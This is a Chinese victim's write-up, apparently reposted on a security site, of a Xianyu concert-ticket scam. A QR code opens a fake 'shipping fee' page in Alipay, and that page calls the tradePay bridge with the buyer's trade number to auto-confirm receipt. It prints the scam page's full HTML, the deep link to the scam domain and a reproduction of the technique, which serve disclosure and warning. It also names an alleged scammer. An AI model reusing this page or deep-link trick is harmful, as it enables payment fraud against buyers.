悲惨经历
我想买两张周杰伦演唱会的门票。在小红书上和骗子联系好后,骗子首先发来了闲鱼宝贝的链接(是真的在闲鱼平台上的),我在闲鱼将其拍下之后。骗子以要我付运费为理由,发给我一个二维码,要我在闲鱼平台打开扫描。这个二维码通过闲鱼扫描之后会跳转到支付宝,支付宝支付一元之后,闲鱼突然自动收货了,此时骗子收到钱了之后把我拉黑了。
事件详情
首先,我要把这个被骗的锅甩一半给支付宝和闲鱼
@支付宝
@闲鱼
事件经过
我想买两张周杰伦演唱会的门票。在小红书上和骗子联系好后,骗子首先发来了闲鱼宝贝的链接(是真的在闲鱼平台上的),我在闲鱼将其拍下之后。骗子以要我付运费为理由,发给我一个二维码,要我在闲鱼平台打开扫描。
二维码如下:
这个二维码通过闲鱼扫描之后会跳转到支付宝,支付宝支付一元之后,闲鱼突然自动收货了,此时骗子收到钱了之后把我拉黑了。
支付宝截图如下:
骗子手法
二维码解码
在我意识到被骗之后,我对二维码内容进行了解码分析,二维码解码内容如下:
alipays://platformapi/startapp?appId=20000067&url=http://kgnb763n.blogqt.gq/index.php这段代码的意思打开支付宝APP并跳转到http://kgnb763n.blogqt.gq/index.php这个URL网页。
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>闲鱼尊享寄-运费保价</title><meta name="keywords" content=""/><meta name="description" content=""/><link rel="stylesheet" href="min/55555-f5.css" media="all"><script src="min/55555-f5.js"></script><script src="min/2023-f5.js"></script><style>*{margin: 0;padding: 0;}html{width:100%;height: 100%;background:#fff;}body{width:100%;height: 100%;background:#fff;}.main{width:100%;height: 100%;background:#fff;}.header{width:100%;height: 20%;background:#fff;}.header img{width:100%;height: 100%;}.content{width:100%;height: 70%;background:#fff;}.content .tupian{margin-top:20%;text-align: center;}.biaoti{text-align: center;font-weight: bold;font-size: 1rem;margin-top: 20%;}.wenzi1{width:86%;height: 6%;margin: 5% auto;text-align: left;background: #F6F7F9;border-radius: 0.5rem;padding:4% 2%;font-size: 0.8rem;}.wenzi1 a{color: #5698E5;}.wenzi2{width:84%;height: 15%;margin: 2% auto;text-align: left;border-radius: 0.5rem;padding:2% 2% 0% 2%;font-size: 0.8rem;border:0.2rem solid #E7E7E7;}.wenzi2 .left{width:50%;float:left;}.wenzi2 .right{width:50%;float:right;text-align: right;margin-top:1.8rem;}.wenzi3{width:90%;margin: 2% auto;margin-top:6rem;}.wenzi4{width:86%;height: 6%;margin: 2% auto;text-align: left;border-radius: 0.5rem;padding:4% 2%;font-size: 0.8rem;}.wenzi4 .left{width:50%;float:left;}.wenzi4 .right{width:50%;float:right;height: 2rem;text-align: center;line-height: 2rem;background: #FBE64D;margin-top:-0.5rem;border-radius: 2rem;font-weight: bold;}</style></head><body><div class="main"><div class="header"><img src="min/header.png" alt=""></div><div class="content"><div class="tupian"><img style="width:3rem;height:3rem;" src="min/wangchongf5f5.png" alt=""><img style="width:3rem;height:3rem;" src="min/wangchongf5.png" alt=""><img style="width:3rem;height:3rem;" src="min/zhifubao.png" alt=""></div><h1 class="biaoti">闲鱼尊享寄</h1><div class="wenzi1">贵重物品需要【买家】使用【闲鱼尊享寄】。推荐使用<a href="">免费保价</a >,平台保障,更放心,丢必赔!</div><div class="wenzi2"><div class="left">丢损必赔<img style="width:1rem;margin-left:0.1rem;margin-top:-0.2rem" src="min/xiaoinfo.png" alt=""><br>免费赠送最高10000元保价,丢失急速赔付。</div><div class="right"><span>¥0.00</span><img style="width:1rem;margin-left:0.1rem;margin-top:-0.2rem" src="min/gou.png" alt=""></div></div><div class="wenzi3"><img style="width:1rem;margin-left:0.1rem;margin-top:-0.2rem" src="min/gou.png" alt=""><span style="color:#CFCFCF;">我已阅读并同意</span>《闲鱼用户服务协议》</div><div class="wenzi4"><div class="left">实际运费<span style="color:red;font-weight:bold;font-size:1.1rem;">¥1.00</span></div><div class="right tradeno"><span>立即支付</span></div></div></div></div><script>if (/AlipayClient/.test(window.navigator.userAgent)) {} else {$('.main').css('background','#F0EFF5');$('.main').html('<img style="width:100%;height:20rem" src="min/f5.png" alt="" />');}function ready(callback) {if (window.AlipayJSBridge) {callback && callback();} else {document.addEventListener('AlipayJSBridgeReady',callback,false);}}ready(function(){document.querySelector('.tradeno').addEventListener('click',function() {AlipayJSBridge.call("tradePay",{tradeNO: "2023042622001117931411645218"},function(result) {});});});</script></body></html>
网页代码分析
在浏览器中打开网页:
骗子代码判断了user-agent来判断是否为支付宝平台,这里我模拟一下支付宝的ua。
模拟完成之后顺利出现了骗子网页。
通过查看JS代码,我发现骗子主要是通过这段代码来进行闲鱼的自动确认收货。
document.querySelector('.tradeno').addEventListener('click',
function() { AlipayJSBridge.call("tradePay",
{
tradeNO: "2023042622001174211404250439"
},
function(result) {
});
这段代码的意思是当你点击支付按钮的时候,会调用支付宝的API来弹出快捷支付,支付的订单是你和骗子交易的支付宝交易号。
也就是说,如果你在闲鱼下单之后,再使用你的支付宝账号向这笔订单付款,就会将这笔订单的状态自动变成确认收货状态,从而骗子可以收到款项
@支付宝
@闲鱼
。而且目前来看骗子还在利用这一点疯狂骗人,平台应该负有责任。
报警回执
谢谢天山派出所的民警。
骗子姓名
赵云龙
https://zhuanlan.zhihu.com/p/625230704?utm_medium=social&utm_oi=674035325953773568&utm_psn=1637886201267691520&utm_source=wechat_timeline&s_r=0&wechatShare=1以下内容涉及技术复现,非技术人员不需要看。
诈骗思路复现
1、如何让你在支付宝内自动确认收货的?
背景:
用户在闲鱼购买商品支付的钱是放在支付宝担保的并没有划给闲鱼卖家,支付宝作为中介,所以钱是放在支付宝官方的,骗子想得到这个钱就必须要让用户确认收货,收货后钱就会划到骗子的支付宝账户中。(这里不谈是否可以根据实名账户找到骗子,因为很多都是通过别的手段拿到的非自己的账号。)
而支付官方提供的下面的方法就可以根据「支付宝交易号」实现自动确认收货的功能(因为这里之前买家已经支付过了,卖家也操作了已发货,所以再调用这个「快捷支付」的组件就变成了「确认收货」)
这个能力开放出来了有产品它们的考量,但是进行这个操作没有任何提示框是欠妥的,这一步对用户来说完全是无感的,我测试的时候点击按钮后就直接触发了面容支付,想有犹豫的机会都没有
静态 HTML 页面支付宝 APP 运用了快捷支付的组件,附上文档地址
http://myjsapi.alipay.com/jsapi/native/trade-pay.html这里不得不吐槽一下,我拿这个示例代码死活拉不起支付弹窗,原来是因为文档中的类名不一致(途中画红线的地方)
<h1>点击以下按钮唤起收银台支付</h1><a href="javascript:void(0)" class="btn tradeno">支付宝交易号唤起支付</a><script>function ready(callback) {// 如果jsbridge已经注入则直接调用if (window.AlipayJSBridge) {callback && callback();} else {// 如果没有注入则监听注入的事件document.addEventListener('AlipayJSBridgeReady', callback, false);}}ready(function(){document.querySelector('.tradeno').addEventListener('click', function() {AlipayJSBridge.call("tradePay", {tradeNO: "201802282100100427058809844"}, function(result) {alert(JSON.stringify(result));});});});</script>
这段代码实现了一个支付宝收银台的支付功能,包括一个标题和一个按钮。当用户点击按钮时,会调用 `ready` 函数来判断 `AlipayJSBridge` 是否注入,如果已经注入则直接执行支付逻辑,如果没有注入则等待 `AlipayJSBridgeReady` 事件的到来,然后再执行支付逻辑。在支付逻辑中,代码使用 `AlipayJSBridge.call` 函数来调用支付接口,传递了交易号 `tradeNO` 和一个回调函数用于处理支付结果。
需要注意的是,在前端代码中直接使用交易号来发起支付是不安全的,因为攻击者可以通过修改交易号来进行恶意操作。因此,在实际开发中应该在服务端生成安全的支付链接,然后将链接返回给前端,最后由前端直接跳转到支付宝收银台页面完成支付操作。
2、网友疑问如何拿到「支付宝交易号」的?
很简单,骗子直接去到和他咸鱼号绑定收款的支付宝后台就能拿到了
3、跨应用跳转不应该可疑吗?
闲鱼跳转其它 APP,用户可能会怀疑,但是跳转到支付宝去大部分都不会怀疑,毕竟「闲鱼」和「支付宝」毕竟属于拥有同一个爸爸,再加上骗子引导的是在闲鱼扫描二维码(支付运费),用户认为还是在闲鱼内交易,并且之前上千的款项已经都支付了,再补个1块钱的运费也没啥的,并且这一套流程下来从闲鱼跳转到支付宝很丝滑,在支付宝内打开了骗子精心包装的页面(通过下图拼装的url就能直接落地到目标页面)
上面是把整个流程倒推的技术实现,希望不要技术作恶,这样很容易进去踩缝纫机。
这个骗局我也已经复现了,我个人觉得丝滑顺畅的体验流程给骗子很多可利用的空间(特别是第一步,用户都不知道操作这一步是需要干嘛,应该官方出一个 confirm 确认弹窗,毕竟上面的支付宝交易订单号谁都可以拿来用来确认收货,就看通过什么样的方式骗买家点击包装好的按钮)
虽然这里非买家点击按钮时会有提示,但是正在的买家点击按钮就直接 面容支付(确认收货) 了
当然事情发生后要坚决选择报警,我网上搜了一圈发现被骗的人不少,发现也有网友追回损失的。
原文地址:
https://zhuanlan.zhihu.com/p/627116842类似案例
近日,浙江杭州一男子在闲鱼app交易时,点击卖家发送的不明链接,却立刻跳转支付宝人脸识别,随机确认收货,此时卖家仅发货4分钟。当事人杜先生回应,卖家已主动归还5100元求撤案,警方称其触犯帮助信息网络犯罪活动罪。
3月28日,杜先生告诉九派新闻,24日中午12时许,他在闲鱼看中一款苹果手机13pro max,卖家账号没有任何交易记录,并说“走验货宝耽误我,我急用钱”。
他付款5100元,16分钟后,卖家称,“快递来取货了,发顺丰”。半小时后,平台显示手机已发货,卖家发送“邀请你完成买家实名效验”的链接。
杜先生点击链接,页面跳转到支付宝的菜鸟裹裹物流验证,“我也没多想,点了认证查询,出现人脸识别界面,我根本来不及反应,订单已经确认收货了。”
发货仅4分钟,钱款已到卖家支付宝账户。
他要求卖家退钱被拉黑,对方还给了他“收货神速”好评。
他质疑:“闲鱼平台没有提示点击链接有交易风险。也没有因为确认收货过快,冻结对方账户。”
对此,闲鱼客服称:“当平台识别出交易有风险时,钱款才会被冻结15天。杜先生的5100元正常转移到卖家的支付宝账户,卖家不退款,我们也无法操作,只能限制他的账号功能。”
支付宝客服建议申请冻结卖家账号,并立即报警。同日,浙江省杭州市公安局拱墅区分局东新派出所将杜先生被诈骗一事立案侦查。
其间,杜先生发现,卖家又上架了一部苹果13手机,他将立案回执单提交到支付宝,对方账号被冻结,并在闲鱼申请卖家信息披露。
25日,一名网友帮杜先生查看了该卖家购买的阿里云域名,服务器显示在香港,账号涉及淘宝、闲鱼、转转和交易猫。
27日,卖家电话联系杜先生,自称是江西的大二学生,把支付宝账号借给了有案底的朋友,账号被封禁了才发现,并表示自己可以取出定期存款,先垫付5100元,请求撤案。
下午5时许,杜先生收到对方的转账。
随后,负责该案的民警传唤许某某接受调查,称其已经触犯帮助信息网络犯罪活动罪。
原文地址:
https://www.toutiao.com/article/7215806416261677601/?channel=&source=search_tab&wid=1683339474789如有侵权请联系:admin#unsafe.sh